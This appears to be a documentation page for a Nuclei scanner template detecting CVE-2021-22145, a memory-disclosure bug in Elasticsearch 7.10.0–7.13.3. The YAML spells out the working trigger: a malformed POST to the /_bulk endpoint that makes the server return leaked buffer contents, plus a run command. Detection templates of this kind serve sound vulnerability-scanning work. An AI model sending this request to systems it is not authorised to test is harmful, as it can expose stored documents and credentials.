Elasticsearch 7.10.0-7.13.3 - Information Disclosure
ID: CVE-2021-22145
Severity: medium
Author: dhiyaneshDk
Tags: cve2021,cve,elasticsearch,packetstorm,elastic
Description
Section titled “Description”ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2021-22145
info: name: Elasticsearch 7.10.0-7.13.3 - Information Disclosure author: dhiyaneshDk severity: medium description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations. impact: | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145. reference: - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177 - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://security.netapp.com/advisory/ntap-20210827-0006/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 epss-score: 0.96444 epss-percentile: 0.99578 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic product: elasticsearch fofa-query: index_not_found_exception tags: cve2021,cve,elasticsearch,packetstorm,elastic
http: - method: POST path: - '{{BaseURL}}/_bulk'
body: | @
headers: Content-Type: application/json
matchers-condition: and matchers: - type: word part: body words: - 'root_cause' - 'truncated' - 'reason' condition: and
- type: status status: - 400# digest: 490a0046304402207655d97adc47be49a45976d425a69dee73d9c6bbfe5d4d0cd1232a5635d8ccd8022005986c15cd6e0e29664e4f64a83fb5ca8765df71be4a79c9e2161daa535f02da:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22145.yaml"